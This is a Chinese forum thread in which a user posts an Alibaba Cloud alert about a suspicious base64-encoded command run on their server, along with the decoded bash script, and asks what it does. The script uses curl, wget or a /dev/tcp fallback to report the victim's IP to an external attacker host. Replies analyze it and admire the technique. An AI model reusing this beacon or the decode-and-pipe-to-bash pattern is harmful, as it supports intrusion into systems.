收到条阿里云的告警，看不懂是做什么用的，请教一下

2021-10-29 09:43:01 +08:00

ipeony

告警信息

进程异常行为-可疑编码命令待处理
备注
该告警由如下引擎检测发现：
用户名: chrony
命令行: sh -c echo IyEvYmluL2Jhc2gKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKICBET0M9LyR7cGF0aC8vIC8vfQogIEhPU1Q9JHtzZXJ2ZXIvLzoqfQogIFBPUlQ9JHtzZXJ2ZXIvLyo6fQogIFtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCgogIGV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAogIGVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcbkhvc3Q6ICR7SE9TVH1cclxuXHJcbiIgPiYzCiAgKHdoaWxlIHJlYWQgbGluZTsgZG8KICAgW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM+Ji0KfQoKaWYgWyAteCAiJChjb21tYW5kIC12IGN1cmwpIiBdOyB0aGVuCiAgY3VybCAtbyAvZGV2L251bGwgMjEyLjE0Ny4zMi4zNS9nY2FlLzEwMS4zNy43OC4xMDgKZWxpZiBbIC14ICIkKGNvbW1hbmQgLXYgd2dldCkiIF07IHRoZW4KICB3Z2V0IC1xIC1PLSAyMTIuMTQ3LjMyLjM1L2djYWUvMTAxLjM3Ljc4LjEwOAplbHNlCiAgX19jdXJsIGh0dHA6Ly8yMTIuMTQ3LjMyLjM1L2djYWUvMTAxLjM3Ljc4LjEwOCA+L2Rldi9udWxsCmZpCgo= | base64 -d | bash
进程路径: /bin/dash
进程 ID: 26803
父进程文件路径: /usr/bin/perl
父进程 ID: 26798
事件说明: 检测模型发现您的服务器上执行的进程命令行高度可疑，很有可能与木马、病毒、黑客行为有关。

解密后的脚本

#!/bin/bash
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

if [ -x "$(command -v curl)" ]; then
  curl -o /dev/null 212.147.32.35/gcae/101.37.78.108
elif [ -x "$(command -v wget)" ]; then
  wget -q -O- 212.147.32.35/gcae/101.37.78.108
else
  __curl http://212.147.32.35/gcae/101.37.78.108 >/dev/null
fi

10520 次点击

所在节点

51 条回复

mikywei

2021-10-29 14:33:37 +08:00

所以云厂商无时无刻不在检测着用户的数据吗？真没安全感，感觉能随时取走用户的任何文件似的。

Alexonx

2021-10-29 14:47:32 +08:00

@villivateur 这个并不是一个设备，应该是 bash 提供的 feature ，允许通过这种方式发起 socket 连接。实际上这个设备应该是不存在的.....用其他 shell 也不一定能跑

ipeony

2021-10-29 14:52:31 +08:00

@vinle #18 老实说我没发现有什么影响，当然可能数据泄漏光了（然而也没啥敏感的东西），或者被拿来挖矿（也没发现这个迹象），又或者上面有人提到的拿来 CC 别人（已经被我精致访问外网了

sola97

2021-10-29 14:53:13 +08:00

这个 curl 保存了

cz5424

2021-10-29 15:02:02 +08:00

值得学习的一个 bash

FreeEx

2021-10-29 15:05:20 +08:00

收藏了，为了这个 curl 脚本

ETiV

2021-10-29 15:09:57 +08:00

非常魔性的写法，sentry docker-compose 部署方式下，健康检查就是用这种方式实现的…装个 curl 就这么难吗🤦‍♂️

https://github.com/getsentry/onpremise/blob/master/docker-compose.yml#L298

Radiation

2021-10-29 15:17:22 +08:00

反弹 shell 用的

maskerTUI

2021-10-29 15:26:30 +08:00

写这脚本的人是高手

zwgf

2021-10-29 15:34:35 +08:00

自己实现 curl ，这个黑阔可以

scyuns

2021-10-29 15:38:04 +08:00

学习了跟着黑阔学技术

oser

2021-10-29 15:41:12 +08:00

有意思，学习了

wellsc

2021-10-29 15:42:53 +08:00

哈哈哈

kwanzaa

2021-10-29 16:10:07 +08:00

哈哈哈哈学到了

labulaka521

2021-10-29 16:36:59 +08:00

为什么 linux 上没有 /dev/tcp 这个呢

labulaka521

2021-10-29 16:52:13 +08:00

@labulaka521 有

kugouo4

2021-10-29 17:02:15 +08:00

v2ex 之跟着黑客学技术，妈妈再也不用担心容器里没有 curl 和 wget 了

cxy2244186975

2021-10-29 17:31:44 +08:00

乌云幸存白帽子路过……

radishear

2021-10-29 18:01:31 +08:00

学到了

ericwood067

2021-10-29 18:02:39 +08:00

这个脚步并没有单独干什么，只是把你的 IP 地址 101.37.78.108 上报给了他们的服务器 http://212.147.32.35/gcae/，主要是看看有没有后续操作。

第 2 页／共 3 页

上一页下一页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://tanronggui.xyz/t/811424

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX